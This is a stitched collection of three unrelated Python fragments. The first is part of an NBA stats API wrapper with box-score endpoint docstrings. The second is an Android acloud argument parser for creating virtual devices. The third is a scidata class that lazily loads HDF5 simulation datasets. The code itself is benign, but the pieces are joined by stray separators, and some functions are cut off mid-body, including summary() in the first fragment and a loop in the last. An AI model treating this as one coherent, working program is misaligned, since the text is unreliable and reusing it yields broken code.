:type range_type: nba.nba.bin.enums.RangeType
:returns: four factors stats on team/player basis, as defined below by idx_data table.
:rtype: Dataframe
======== ====================== ==================================================
idx_data Name Description
======== ====================== ==================================================
0 sqlPlayersFourFactors Four factors stats on an individual player basis.
1 sqlTeamsFourFactors Four factors stats on a team basis.
======== ====================== ==================================================
"""
params = clean_locals(locals())
endpoint = "boxscorefourfactorsv2"
r = self.request(endpoint, params)
df = self.process_response(r, idx_data, "resultSets")
return df
def miscellaneous(
self,
game_id,
idx_data,
start_period=enums.StartPeriod.Default,
end_period=enums.EndPeriod.Default,
start_range=enums.StartRange.Default,
end_range=enums.EndRange.Default,
range_type=enums.RangeType.Default,
):
"""
Get miscellaneous stats for a given game.
:param game_id: id for the game to get data for.
:type game_id: str
:param idx_data: the index to retrieve data from json.
:type idx_data: int
:param start_period: filter starting quarter to retrieve data for.
:type start_period: nba.nba.bin.enums.StartPeriod
:param end_period: filter upper quarter cutoff for data.
:type end_period: nba.nba.bin.enums.EndPeriod
:param start_range: mandatory in url build, appear to have no effect.
:type start_range: nba.nba.bin.enums.StartRange
:param end_range: mandatory in url build, appear to have no effect.
:type end_range: nba.nba.bin.enums.EndRange
:param range_type: mandatory in url build, appear to have no effect.
:type range_type: nba.nba.bin.enums.RangeType
:returns: miscellaneous stats on team/player basis, as defined below by idx_data table.
:rtype: Dataframe
======== =============== ==================================================
idx_data Name Description
======== =============== ==================================================
0 sqlPlayersMisc Miscellaneous stats on an individual player basis.
1 sqlTeamsMisc Miscellaneous stats on a team basis.
======== =============== ==================================================
"""
params = clean_locals(locals())
endpoint = "boxscoremiscv2"
r = self.request(endpoint, params)
df = self.process_response(r, idx_data, "resultSets")
return df
def scoring(
self,
game_id,
idx_data,
start_period=enums.StartPeriod.Default,
end_period=enums.EndPeriod.Default,
start_range=enums.StartRange.Default,
end_range=enums.EndRange.Default,
range_type=enums.RangeType.Default,
):
"""
Get scoring stats for a given game.
:param game_id: id for the game to get data for.
:type game_id: str
:param idx_data: the index to retrieve data from json.
:type idx_data: int
:param start_period: filter starting quarter to retrieve data for.
:type start_period: nba.nba.bin.enums.StartPeriod
:param end_period: filter upper quarter cutoff for data.
:type end_period: nba.nba.bin.enums.EndPeriod
:param start_range: mandatory in url build, appear to have no effect.
:type start_range: nba.nba.bin.enums.StartRange
:param end_range: mandatory in url build, appear to have no effect.
:type end_range: nba.nba.bin.enums.EndRange
:param range_type: mandatory in url build, appear to have no effect.
:type range_type: nba.nba.bin.enums.RangeType
:returns: scoring stats on team/player basis, as defined below by idx_data table.
:rtype: Dataframe
======== ================== ==================================================
idx_data Name Description
======== ================== ==================================================
0 sqlPlayersScoring Scoring stats on an individual player basis.
1 sqlTeamsScoring Scoring stats on a team basis.
======== ================== ==================================================
"""
params = clean_locals(locals())
endpoint = "boxscorescoringv2"
r = self.request(endpoint, params)
df = self.process_response(r, idx_data, "resultSets")
return df
def traditional(
self,
game_id,
idx_data,
start_period=enums.StartPeriod.Default,
end_period=enums.EndPeriod.Default,
start_range=enums.StartRange.Default,
end_range=enums.EndRange.Default,
range_type=enums.RangeType.Default,
):
"""
Get traditional box score stats for a given game.
:param game_id: id for the game to get data for.
:type game_id: str
:param idx_data: the index to retrieve data from json.
:type idx_data: int
:param start_period: filter starting quarter to retrieve data for.
:type start_period: nba.nba.bin.enums.StartPeriod
:param end_period: filter upper quarter cutoff for data.
:type end_period: nba.nba.bin.enums.EndPeriod
:param start_range: mandatory in url build, appear to have no effect.
:type start_range: nba.nba.bin.enums.StartRange
:param end_range: mandatory in url build, appear to have no effect.
:type end_range: nba.nba.bin.enums.EndRange
:param range_type: mandatory in url build, appear to have no effect.
:type range_type: nba.nba.bin.enums.RangeType
:returns: traditional box scores on team/player/startvsbench basis, as defined below by idx_data table.
:rtype: Dataframe
======== ====================== ============================================================
idx_data Name Description
======== ====================== ============================================================
0 PlayerStats Traditional box scores on an individual player basis.
1 TeamStats Traditional box scores on a team basis.
2 TeamStarterBenchStats Traditional box scores on a starter vs bench split per team.
======== ====================== ============================================================
"""
params = clean_locals(locals())
endpoint = "boxscoretraditionalv2"
r = self.request(endpoint, params)
df = self.process_response(r, idx_data, "resultSets")
return df
def usage(
self,
game_id,
idx_data,
start_period=enums.StartPeriod.Default,
end_period=enums.EndPeriod.Default,
start_range=enums.StartRange.Default,
end_range=enums.EndRange.Default,
range_type=enums.RangeType.Default,
):
"""
Get usage stats for a given game.
:param game_id: id for the game to get data for.
:type game_id: str
:param idx_data: the index to retrieve data from json.
:type idx_data: int
:param start_period: filter starting quarter to retrieve data for.
:type start_period: nba.nba.bin.enums.StartPeriod
:param end_period: filter upper quarter cutoff for data.
:type end_period: nba.nba.bin.enums.EndPeriod
:param start_range: mandatory in url build, appear to have no effect.
:type start_range: nba.nba.bin.enums.StartRange
:param end_range: mandatory in url build, appear to have no effect.
:type end_range: nba.nba.bin.enums.EndRange
:param range_type: mandatory in url build, appear to have no effect.
:type range_type: nba.nba.bin.enums.RangeType
:returns: Usage stats on a player/team, as defined below by idx_data.
:rtype: Dataframe
======== ================ ==================================================
idx_data Name Description
======== ================ ==================================================
0 sqlPlayersUsage Usage stats on an individual player basis.
1 sqlTeamsUsage Usage stats on a team basis.
======== ================ ==================================================
"""
params = clean_locals(locals())
endpoint = "boxscoreusagev2"
r = self.request(endpoint, params)
df = self.process_response(r, idx_data, "resultSets")
return df
def summary(
self,
game_id,
idx_data,
start_period=enums.StartPeriod.Default,
end_period=enums.EndPeriod.Default,
start_range=enums.StartRange.Default,
end_range=enums.EndRange.Default,
range_type=enums.RangeType.Default,
):
"""
Get high level game summary stats for a given game.
:param game_id: id for the game to get data for.
:type game_id: str
:param idx_data: the index to retrieve data from json.
:type idx_data: int
:param start_period: filter starting quarter to retrieve data for.
:type start_period: nba.nba.bin.enums.StartPeriod
:param end_period: filter upper quarter cutoff for data.
:type end_period: nba.nba.bin.enums.EndPeriod
:param start_range: mandatory in url build, appear to have no effect.
:type start_range: nba.nba.bin.enums.StartRange
:param end_range: mandatory in url build, appear to have no effect.
:type end_range: nba.nba.bin.enums.EndRange
:param range_type: mandatory in url build, appear to have no effect.
:type range_type: nba.nba.bin.enums.RangeType
:returns: high level game information, as defined below by idx_data table below.
:rtype: Dataframe
======== ================ ==================================================
idx_data Name Description
======== ================ ==================================================
0 GameSummary High level overview of game information.
1 OtherStats Other high level game stats.
2 Officials Officials names and id's.
3 InactivePlayers Players not on roster for game.
4 GameInfo Date, attendance, time.
5 LineScore Scores by period.
6 LastMeeting Most recent meeting score and game info.
7 SeasonSeries Series results so far this season.
8 AvailableVideo Availability by video type.
======== ================ ==================================================
"""
params = clean_locals(locals())
| |
# Copyright 2018 - The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Create args.
Defines the create arg parser that holds create specific args.
"""
import argparse
import os
from acloud import errors
from acloud.create import create_common
from acloud.internal import constants
from acloud.internal.lib import utils
_DEFAULT_GPU = "default"
CMD_CREATE = "create"
# TODO: Add this into main create args once create_cf/gf is deprecated.
def AddCommonCreateArgs(parser):
    """Adds arguments common to create parsers.
    Args:
        parser: ArgumentParser object, used to parse flags.
    """
    # --- General instance options. ---
    parser.add_argument(
        "--num",
        type=int,
        dest="num",
        required=False,
        default=1,
        help="Number of instances to create.")
    parser.add_argument(
        "--serial-log-file",
        type=str,
        dest="serial_log_file",
        required=False,
        help="Path to a *tar.gz file where serial logs will be saved "
             "when a device fails on boot.")
    # --- Connection behavior (adb/vnc/webrtc tunnels). ---
    parser.add_argument(
        "--autoconnect",
        type=str,
        nargs="?",
        const=constants.INS_KEY_VNC,
        dest="autoconnect",
        required=False,
        choices=[constants.INS_KEY_VNC, constants.INS_KEY_ADB,
                 constants.INS_KEY_WEBRTC],
        help="Determines to establish a tunnel forwarding adb/vnc and "
             "launch VNC/webrtc. Establish a tunnel forwarding adb and vnc "
             "then launch vnc if --autoconnect vnc is provided. Establish a "
             "tunnel forwarding adb if --autoconnect adb is provided. "
             "Establish a tunnel forwarding adb and auto-launch on the browser "
             "if --autoconnect webrtc is provided. For local goldfish "
             "instance, create a window.")
    parser.add_argument(
        "--no-autoconnect",
        action="store_false",
        dest="autoconnect",
        required=False,
        help="Will not automatically create ssh tunnels forwarding adb & vnc "
             "when instance created.")
    parser.set_defaults(autoconnect=constants.INS_KEY_VNC)
    parser.add_argument(
        "--unlock",
        action="store_true",
        dest="unlock_screen",
        required=False,
        default=False,
        help="This can unlock screen after invoke vnc client.")
    parser.add_argument(
        "--report-internal-ip",
        action="store_true",
        dest="report_internal_ip",
        required=False,
        help="Report internal ip of the created instance instead of external "
             "ip. Using the internal ip is used when connecting from another "
             "GCE instance.")
    parser.add_argument(
        "--network",
        type=str,
        dest="network",
        required=False,
        help="Set the network the GCE instance will utilize.")
    parser.add_argument(
        "--skip-pre-run-check",
        action="store_true",
        dest="skip_pre_run_check",
        required=False,
        help="Skip the pre-run check.")
    parser.add_argument(
        "--boot-timeout",
        dest="boot_timeout_secs",
        type=int,
        required=False,
        help="The maximum time in seconds used to wait for the AVD to boot.")
    parser.add_argument(
        "--wait-for-ins-stable",
        dest="ins_timeout_secs",
        type=int,
        required=False,
        help="The maximum time in seconds used to wait for the instance boot "
             "up. The default value to wait for instance up time is 300 secs.")
    # --- Android build artifact selection. ---
    parser.add_argument(
        "--build-target",
        type=str,
        dest="build_target",
        help="Android build target, e.g. aosp_cf_x86_phone-userdebug, "
             "or short names: phone, tablet, or tablet_mobile.")
    parser.add_argument(
        "--branch",
        type=str,
        dest="branch",
        help="Android branch, e.g. mnc-dev or git_mnc-dev")
    parser.add_argument(
        "--build-id",
        type=str,
        dest="build_id",
        help="Android build id, e.g. 2145099, P2804227")
    # --- Kernel image selection. ---
    parser.add_argument(
        "--kernel-build-id",
        type=str,
        dest="kernel_build_id",
        required=False,
        help="Android kernel build id, e.g. 4586590. This is to test a new"
        " kernel build with a particular Android build (--build-id). If neither"
        " kernel-branch nor kernel-build-id are specified, the kernel that's"
        " bundled with the Android build would be used.")
    parser.add_argument(
        "--kernel-branch",
        type=str,
        dest="kernel_branch",
        required=False,
        help="Android kernel build branch name, e.g."
        " kernel-common-android-4.14. This is to test a new kernel build with a"
        " particular Android build (--build-id). If specified without"
        " specifying kernel-build-id, the last green build in the branch will"
        " be used. If neither kernel-branch nor kernel-build-id are specified,"
        " the kernel that's bundled with the Android build would be used.")
    parser.add_argument(
        "--kernel-build-target",
        type=str,
        dest="kernel_build_target",
        default="kernel",
        help="Kernel build target, specify if different from 'kernel'")
    # --- System image selection (cuttlefish only). ---
    parser.add_argument(
        "--system-branch",
        type=str,
        dest="system_branch",
        help="'cuttlefish only' Branch to consume the system image (system.img) "
             "from, will default to what is defined by --branch. "
             "That feature allows to (automatically) test various combinations "
             "of vendor.img (CF, e.g.) and system images (GSI, e.g.). ",
        required=False)
    parser.add_argument(
        "--system-build-id",
        type=str,
        dest="system_build_id",
        help="'cuttlefish only' System image build id, e.g. 2145099, P2804227",
        required=False)
    parser.add_argument(
        "--system-build-target",
        type=str,
        dest="system_build_target",
        help="'cuttlefish only' System image build target, specify if different "
             "from --build-target",
        required=False)
    # TODO(146314062): Remove --multi-stage-launch after infra don't use this
    # args.
    parser.add_argument(
        "--multi-stage-launch",
        dest="multi_stage_launch",
        action="store_true",
        required=False,
        default=True,
        help="Enable the multi-stage cuttlefish launch.")
    parser.add_argument(
        "--no-multi-stage-launch",
        dest="multi_stage_launch",
        action="store_false",
        required=False,
        default=None,
        help="Disable the multi-stage cuttlefish launch.")
    parser.add_argument(
        "--no-pull-log",
        dest="no_pull_log",
        action="store_true",
        required=False,
        default=None,
        help="Disable auto download logs when AVD booting up failed.")
    # TODO(147335651): Add gpu in user config.
    # TODO(147335651): Support "--gpu" without giving any value.
    parser.add_argument(
        "--gpu",
        type=str,
        const=_DEFAULT_GPU,
        nargs="?",
        dest="gpu",
        required=False,
        default=None,
        help="GPU accelerator to use if any. e.g. nvidia-tesla-k80. For local "
             "instances, this arg without assigning any value is to enable "
             "local gpu support.")
    # Hide following args for users, it is only used in infra.
    parser.add_argument(
        "--num-avds-per-instance",
        type=int,
        dest="num_avds_per_instance",
        required=False,
        default=1,
        help=argparse.SUPPRESS)
    parser.add_argument(
        "--zone",
        type=str,
        dest="zone",
        required=False,
        help=argparse.SUPPRESS)
    # TODO(b/118439885): Old arg formats to support transition, delete when
    # transistion is done.
    parser.add_argument(
        "--serial_log_file",
        type=str,
        dest="serial_log_file",
        required=False,
        help=argparse.SUPPRESS)
    parser.add_argument(
        "--build_id",
        type=str,
        dest="build_id",
        required=False,
        help=argparse.SUPPRESS)
    parser.add_argument(
        "--build_target",
        type=str,
        dest="build_target",
        required=False,
        help=argparse.SUPPRESS)
    parser.add_argument(
        "--system_branch",
        type=str,
        dest="system_branch",
        required=False,
        help=argparse.SUPPRESS)
    parser.add_argument(
        "--system_build_id",
        type=str,
        dest="system_build_id",
        required=False,
        help=argparse.SUPPRESS)
    parser.add_argument(
        "--system_build_target",
        type=str,
        dest="system_build_target",
        required=False,
        help=argparse.SUPPRESS)
    parser.add_argument(
        "--kernel_build_id",
        type=str,
        dest="kernel_build_id",
        required=False,
        help=argparse.SUPPRESS)
    parser.add_argument(
        "--kernel_branch",
        type=str,
        dest="kernel_branch",
        required=False,
        help=argparse.SUPPRESS)
    parser.add_argument(
        "--kernel_build_target",
        type=str,
        dest="kernel_build_target",
        default="kernel",
        help=argparse.SUPPRESS)
def GetCreateArgParser(subparser):
"""Return the create arg parser.
Args:
subparser: argparse.ArgumentParser that is attached to main acloud cmd.
Returns:
argparse.ArgumentParser with create options defined.
"""
create_parser = subparser.add_parser(CMD_CREATE)
create_parser.required = False
create_parser.set_defaults(which=CMD_CREATE)
# Use default=None to distinguish remote instance or local. The instance
# type will be remote if the arg is not provided.
create_parser.add_argument(
"--local-instance",
type=_PositiveInteger,
const=0,
metavar="ID",
nargs="?",
dest="local_instance",
required=False,
help="Create a local AVD instance using the resources associated with "
"the ID. Choose an unused ID automatically if the value is "
"not specified (primarily for infra usage).")
create_parser.add_argument(
"--adb-port", "-p",
type=int,
default=None,
dest="adb_port",
required=False,
help="Specify port for adb forwarding.")
create_parser.add_argument(
"--avd-type",
type=str,
dest="avd_type",
default=constants.TYPE_CF,
choices=[constants.TYPE_GCE, constants.TYPE_CF, constants.TYPE_GF, constants.TYPE_CHEEPS,
constants.TYPE_FVP],
help="Android Virtual Device type (default %s)." % constants.TYPE_CF)
create_parser.add_argument(
"--flavor",
type=str,
dest="flavor",
help="The device flavor of the AVD (default %s)." % constants.FLAVOR_PHONE)
create_parser.add_argument(
"--local-image",
type=str,
dest="local_image",
nargs="?",
default="",
required=False,
help="Use the locally built image for the AVD. Look for the image "
"artifact in $ANDROID_PRODUCT_OUT if no args value is provided."
"e.g --local-image or --local-image /path/to/dir or --local-image "
"/path/to/file")
create_parser.add_argument(
"--local-system-image",
type=str,
dest="local_system_image",
nargs="?",
default="",
required=False,
help="Use the locally built system images for the AVD. Look for the "
"images in $ANDROID_PRODUCT_OUT if no args value is provided. "
"e.g., --local-system-image or --local-system-image /path/to/dir")
create_parser.add_argument(
"--local-tool",
type=str,
dest="local_tool",
action="append",
default=[],
required=False,
help="Use the tools in the specified directory to create local "
"instances. The directory structure follows $ANDROID_HOST_OUT or "
"$ANDROID_EMULATOR_PREBUILTS.")
create_parser.add_argument(
"--image-download-dir",
type=str,
dest="image_download_dir",
required=False,
help="Define remote image download directory, e.g. /usr/local/dl.")
create_parser.add_argument(
"--yes", "-y",
action="store_true",
dest="no_prompt",
required=False,
help=("Automatic yes to prompts. Assume 'yes' as answer to all prompts "
"and run non-interactively."))
create_parser.add_argument(
"--reuse-gce",
type=str,
const=constants.SELECT_ONE_GCE_INSTANCE,
nargs="?",
dest="reuse_gce",
required=False,
help="'cuttlefish only' This can help users use their own instance. "
"Reusing specific gce instance if --reuse-gce [instance_name] is "
"provided. Select one gce instance to reuse if --reuse-gce is "
"provided.")
create_parser.add_argument(
"--host",
type=str,
dest="remote_host",
default=None,
help="'cuttlefish only' Provide host name to clean up the remote host. "
"For example: '--host 1.1.1.1'")
create_parser.add_argument(
"--host-user",
type=str,
dest="host_user",
default=constants.GCE_USER,
help="'remote host only' Provide host user for logging in to the host. "
"The default value is vsoc-01. For example: '--host 1.1.1.1 --host-user "
"vsoc-02'")
create_parser.add_argument(
"--host-ssh-private-key-path",
type=str,
dest="host_ssh_private_key_path",
default=None,
help="'remote host only' Provide host key for login on on this host.")
# User should not specify --spec and --hw_property at the same time.
hw_spec_group = create_parser.add_mutually_exclusive_group()
hw_spec_group.add_argument(
"--hw-property",
type=str,
dest="hw_property",
required=False,
help="Supported HW properties and example values: %s" %
constants.HW_PROPERTIES_CMD_EXAMPLE)
hw_spec_group.add_argument(
"--spec",
type=str,
dest="spec",
required=False,
choices=constants.SPEC_NAMES,
help="The name of a pre-configured device spec that we are "
"going to use.")
# Arguments for goldfish type.
# TODO(b/118439885): Verify args that are used in wrong avd_type.
# e.g. $acloud create --avd-type cuttlefish --emulator-build-id
create_parser.add_argument(
"--emulator-build-id",
type=int,
dest="emulator_build_id",
required=False,
help="'goldfish only' Emulator build used to run the images. "
"e.g. 4669466.")
# Arguments for cheeps type.
create_parser.add_argument(
"--stable-cheeps-host-image-name",
type=str,
dest="stable_cheeps_host_image_name",
required=False,
default=None,
| |
"""
description
"""
from __future__ import division
# from sys import path
# path.append('modules/')
# import os.path
# import click
# import h5py
# from argparse import ArgumentParser
# from math import pi, log10
# import sys
from scidata.utils import locate
import scidata.carpet.hdf5 as h5
# from scidata.carpet.interp import Interpolator
# from _curses import raw
# from mpl_toolkits.axes_grid1 import make_axes_locatable
# from matplotlib import ticker
# import matplotlib.pyplot as plt
# from matplotlib import rc
# plt.rc('text', usetex=True)
# plt.rc('font', family='serif')
# import scivis.units as ut # for tmerg
# import statsmodels.formula.api as smf
# import scipy.optimize as opt
# from math import pi, sqrt
# import matplotlib as mpl
# import pandas as pd
import numpy as np
# from glob import glob
# import itertools
# import os.path
# import cPickle
# import click
# import time
# import copy
# import h5py
# import csv
# import os
#
# import time
# import scidata.xgraph as xg
# from scipy import interpolate
# cmap = plt.get_cmap("viridis")
# from sklearn.linear_model import LinearRegression-
# from scipy.optimize import fmin
# from matplotlib.ticker import AutoMinorLocator, FixedLocator, NullFormatter, \
# MultipleLocator
# from matplotlib.colors import LogNorm, Normalize
# from utils import *
from uutils import Tools, Printcolor
from module_preanalysis.it_time import LOAD_ITTIME
# from plotting_methods import PLOT_MANY_TASKS
class LOAD_STORE_DATASETS(LOAD_ITTIME):
    """
    Allows easy access to a scidata datasets of 2d data of a given simulation,
    loading them only if they are needed, and storing them for future accesses.

    Assumes that the simulation data is stored in /output-xxxx/data/ folders,
    where 'xxxx' stands for the number.
    To know, which iterations are stored in what output-xxxx it first loads an
    ascii file <'file_for_it'> which should be present in all output-xxxx and
    have a structure with columns: 1:it 2:time (other columns do not matter)

    The 2d datasets, located in output-xxxx, expected to be named like:
    'rho.xy.h5'. The list of possible variables, (like 'rho') is set in
    <'self.list_v_ns'>. The list of possible planes (like 'xy') is set in
    <'self.list_planes'>.

    Logic:
        Every time when the dataset is requested via <'get_dataset(it, plane, v_n)'>,
        the class do:
        1. Checks what output-xxxx contains iteration 'it'
        2. Checks if the dataset for this output, plane and variable name 'v_n'
           has already been loaded and is present in the storage
           <'self.dataset_matrix[]'>
           If so: it will return the dataset from the storage.
           If not: it will load the required dataset and add it to the storage
           for future uses.
    """

    # Neutrino-leakage variables (effective emissivities 'Q_eff_*', effective
    # rates 'R_eff_*' and optical depths 'optd_*') loadable in addition to the
    # hydro variables listed in __init__.
    list_neut_v_ns = ["Q_eff_nua", "Q_eff_nue", "Q_eff_nux", "R_eff_nua", "R_eff_nue", "R_eff_nux",
                      "optd_0_nua", "optd_0_nux", "optd_0_nue", "optd_1_nua", "optd_1_nux", "optd_1_nue"]

    def __init__(self, sim, indir, pprdir):
        """
        :param sim: simulation name (bookkeeping; also passed to LOAD_ITTIME)
        :param indir: directory that contains the output-xxxx folders
        :param pprdir: post-processing directory (results go to <pprdir>/res_2d/)
        """
        # Parent supplies the iteration<->time bookkeeping used below
        # (get_list_outputs, get_ittime, get_output_for_it).
        LOAD_ITTIME.__init__(self, sim, pprdir=pprdir)
        self.sim = sim
        self.nlevels = 7  # number of mesh-refinement levels expected in the data
        self.gen_set = {'nlevels':7,
                        'sim': sim,
                        'file_for_it': 'H.norm2.asc',
                        'iterations':0,
                        'indir': indir,
                        'outdir': pprdir + '/res_2d/'
                        }
        # self.output_it_map = {}
        self.list_outputs = self.get_list_outputs()
        # Overall iterations/times for which 2D ('d2') data exists.
        _, self.iterations, self.times = \
            self.get_ittime(output="overall", d1d2d3prof="d2")
        # print(self.iterations[0], self.iterations[-1]); exit(1)

        # self.output_it_map, self.it_time = \
        #     set_it_output_map(Paths.gw170817+self.sim+'/')

        # self.iterations = np.array(self.it_time[:, 0], dtype=int)
        # self.times = np.array(self.it_time[:, 1], dtype=float)

        self.list_v_ns = ['rho', 'Y_e', 'temperature', 's_phi', 'entropy', 'dens_unbnd'] + self.list_neut_v_ns
        # NOTE(review): 'xy' appears twice; the last entry was probably meant to
        # be another plane. Index lookups always resolve 'xy' to position 0, so
        # slot 2 of dataset_matrix is never used — confirm intent.
        self.list_planes=['xy', 'xz', 'xy']
        self.set_use_new_output_if_duplicated = False
        # Lazy cache: dataset_matrix[output][plane][v_n] holds a scidata dataset
        # once loaded, or the int 0 as a "not loaded" sentinel.
        self.dataset_matrix = [[[0
                                 for z in range(len(self.list_v_ns))]
                                for k in range(len(self.list_planes))]
                               for s in range(len(self.list_outputs))]

    # def set_it_output_map(self):
    #     """
    #     Loads set of files that have '1:it 2:time ...' structure to get a map
    #     of what output-xxxx contains what iteration (and time)
    #     """
    #     print('-' * 25 + 'LOADING it list ({})'
    #           .format(self.gen_set['file_for_it']) + '-' * 25)
    #     print("\t loading from: {}".format(self.gen_set['indir']))
    #     files = locate(self.gen_set['file_for_it'], root=self.gen_set["indir"], followlinks=True)
    #     # remove folders like 'collated'
    #     selected = []
    #     for file in files:
    #         if file.__contains__('output-'):
    #             selected.append(file)
    #     # for overall count of number of iterations and files
    #     it_time = np.zeros(2)
    #     for file in selected:
    #         o_name = file.split('/')
    #         o_dir = ''
    #         for o_part in o_name:
    #             if o_part.__contains__('output-'):
    #                 o_dir = o_part
    #         if o_dir == '':
    #             raise NameError("Did not find output-xxxx in {}".format(o_name))
    #         it_time_i = np.loadtxt(file, usecols=(0,1))
    #         self.output_it_map[o_dir] = it_time_i
    #         it_time = np.vstack((it_time, it_time_i))
    #     it_time = np.delete(it_time, 0, 0)
    #     print('outputs:{} iterations:{} [{}->{}]'.format(len(selected),
    #                                                      len(it_time[:,0]),
    #                                                      int(it_time[:,0].min()),
    #                                                      int(it_time[:,0].max())))
    #     print('-' * 30 + '------DONE-----' + '-' * 30)
    #
    #     self.output_it_map, it_time = set_it_output_map(Paths.gw170817+self.sim+'/')
    #
    #     return it_time

    def check_v_n(self, v_n):
        """Raise NameError if 'v_n' is not among the known variable names."""
        if v_n not in self.list_v_ns:
            raise NameError("v_n:{} not in the v_n list (in the class)\n{}".format(v_n, self.list_v_ns))

    def check_plane(self, plane):
        """Raise NameError if 'plane' is not among the known planes."""
        if plane not in self.list_planes:
            raise NameError("plane:{} not in the plane_list (in the class)\n{}".format(plane, self.list_planes))

    def i_v_n(self, v_n):
        """Index of variable 'v_n' along the v_n axis of dataset_matrix."""
        self.check_v_n(v_n)
        return int(self.list_v_ns.index(v_n))
    #

    def i_plane(self, plane):
        """Index of 'plane' along the plane axis of dataset_matrix."""
        self.check_plane(plane)
        return int(self.list_planes.index(plane))

    def load_dataset(self, o_dir, plane, v_n):
        """
        Locate the single '<v_n>.<plane>.h5' file under <indir>/<o_dir>/ and
        cache it (as a scidata hdf5 dataset) in self.dataset_matrix.
        Raises ValueError if several files match, IOError if none do.
        """
        fname = v_n + '.' + plane + '.h5'
        files = locate(fname, root=self.gen_set['indir'] + o_dir +'/', followlinks=False)
        print("\t Loading: {} plane:{} v_n:{} dataset ({} files)"
              .format(o_dir, plane, v_n, len(files)))
        if len(files) > 1:
            raise ValueError("More than 1 file ({}) found. \nFile:{} location:{}"
                             "\nFiles: {}"
                             .format(len(files), fname, self.gen_set['indir'] + o_dir +'/', files))
        if len(files) == 0:
            # NOTE(review): typo in the message ("fils" -> "files").
            raise IOError("NO fils found for {}. \nlocation:{}"
                          .format(fname, self.gen_set['indir'] + o_dir +'/'))
        dset = h5.dataset(files)
        # grid = dset.get_grid(iteration=it)
        # print("grid.origin: {}".format(grid.origin))
        # print("grid.dim : {}".format(grid.dim))
        # print("grid.coordinates(): {}".format([ [np.array(coord).min(), np.array(coord).max()] for coord in grid.coordinates()]))
        # print("grid.levels: {}".format([level for level in grid.levels]))
        # print("grid.extent: {}".format(grid.extent))
        # exit(1)
        # print("\t loading it:{} plane:{} v_n:{} dset:{}"
        #       .format(o_dir, plane, v_n, dset))
        # Build the grid mesh up front — presumably to pay the cost once at
        # load time rather than on first access; confirm against scidata docs.
        dset.get_grid().mesh()
        # dset.get_grid_data()
        self.dataset_matrix[self.i_output(o_dir)][self.i_plane(plane)][self.i_v_n(v_n)] = dset

    def i_output(self, o_dir):
        """Index of output directory 'o_dir' along the output axis of dataset_matrix."""
        if o_dir not in self.list_outputs:
            # NOTE(review): message says "plane:" but this checks an output dir.
            raise NameError("plane:{} not in the plane_list (in the class)\n{}"
                            .format(o_dir, self.list_outputs))
        return int(self.list_outputs.index(o_dir))

    def is_dataset_loaded(self, o_dir, plane, v_n):
        """Load the dataset on demand (the int 0 is the 'not loaded' sentinel)."""
        if isinstance(self.dataset_matrix[self.i_output(o_dir)][self.i_plane(plane)][self.i_v_n(v_n)], int):
            self.load_dataset(o_dir, plane, v_n)

    # def it_to_output_dir(self, it):
    #     req_output_data_dir = []
    #     for output_data_dir in self.list_outputs:
    #         if int(it) in np.array(self.output_it_map[output_data_dir], dtype=int)[:, 0]:
    #             req_output_data_dir.append(output_data_dir)
    #
    #     if len(req_output_data_dir) > 1:
    #         if self.set_use_new_output_if_duplicated:
    #             print("Warning: it:{} is found in multiple outputs:{}"
    #                   .format(it, req_output_data_dir))
    #             return req_output_data_dir[0]
    #
    #         raise ValueError("it:{} is found in multiple outputs:{}\n"
    #                          "to overwrite, set 'set_use_new_output_if_duplicated=True' "
    #                          .format(it, req_output_data_dir))
    #     elif len(req_output_data_dir) == 0:
    #         raise ValueError("it:{} not found in a output_it_map:\n{}\n"
    #                          .format(it, self.output_it_map.keys()))
    #     else:
    #         return req_output_data_dir[0]

    def get_dataset(self, it, plane, v_n):
        """
        Return the (cached) scidata dataset that contains iteration 'it' for
        the given plane and variable. Raises ValueError (reporting the closest
        available iteration) if 'it' is not present in the located dataset.
        """
        # o_dir = self.it_to_output_dir(it)
        output = self.get_output_for_it(it)
        self.is_dataset_loaded(output, plane, v_n)
        dset = self.dataset_matrix[self.i_output(output)][self.i_plane(plane)][self.i_v_n(v_n)]
        if not it in dset.iterations:
            it__ = int(dset.iterations[Tools.find_nearest_index(np.array(dset.iterations), it)])
            raise ValueError("Iteration it:{} (located in {}) \n"
                             "not in the dataset list. Closest:{} Full list:\n{}"
                             .format(it, output, it__, dset.iterations))
        return dset

    def del_dataset(self, it, plane, v_n):
        """Drop the cached dataset for the output containing 'it' (frees memory)."""
        # o_dir = self.it_to_output_dir(it)
        output = self.get_output_for_it(it)
        self.dataset_matrix[self.i_output(output)][self.i_plane(plane)][self.i_v_n(v_n)] = 0

    # def get_time(self, it):
    #
    #     time = self.it_time[np.where(self.it_time[:,0] == it), 1]
    #     time = [item for sublist in time for item in sublist]
    #     print(time)
    #     if len(time) == 2:
    #         Printcolor.yellow("for it:{} more than one timestep found {}"
    #                           .format(it, time))
    #         if time[0] == time[1]:
    #             return float(time[0]) * time_constant / 1000
    #         else:
    #             raise ValueError("for it:{} more than one timestep found {}"
    #                              .format(it, time))
    #     if len(time) == 0:
    #         raise ValueError("for it:{} no timesteps found"
    #                          .format(it))
    #     return float(time[0]) * time_constant / 1000

    def load_all(self, plane, v_n):
        """Eagerly load the (plane, v_n) dataset for every output (slow)."""
        print('-' * 25 + 'LOADING ALL DATASETS ({})'
              .format(self.gen_set['file_for_it']) + '-' * 25)
        Printcolor.yellow("Warning: loading all {} datasets "
                          "is a slow process".format(len(self.list_outputs)))
        for o_dir in self.list_outputs:
            try:
                self.is_dataset_loaded(o_dir, plane, v_n)
            except ValueError:
                Printcolor.red("Failed to load o_dir:{} plane:{} v_n:{}"
                               .format(o_dir, plane, v_n))
        # Re-derive self.iterations / self.times from what actually loaded.
        self.set_all_it_times_from_outputs(plane, v_n)
        print('-' * 30 + '------DONE-----' + '-' * 30)

    def get_all_iterations_times(self, plane, v_n):
        """
        Collect the unique, sorted iterations and times over all loaded outputs
        for (plane, v_n). Every output must already be loaded (see load_all).
        """
        iterations = []
        times = []
        for output in self.list_outputs:
            if isinstance(self.dataset_matrix[self.i_output(output)][self.i_plane(plane)][self.i_v_n(v_n)], int):
                raise ValueError("Not all datasets are loaded. Missing: {}".format(output))
            dset = self.dataset_matrix[self.i_output(output)][self.i_plane(plane)][self.i_v_n(v_n)]
            # iterations.append(dset.iterations)
            for it in dset.iterations:
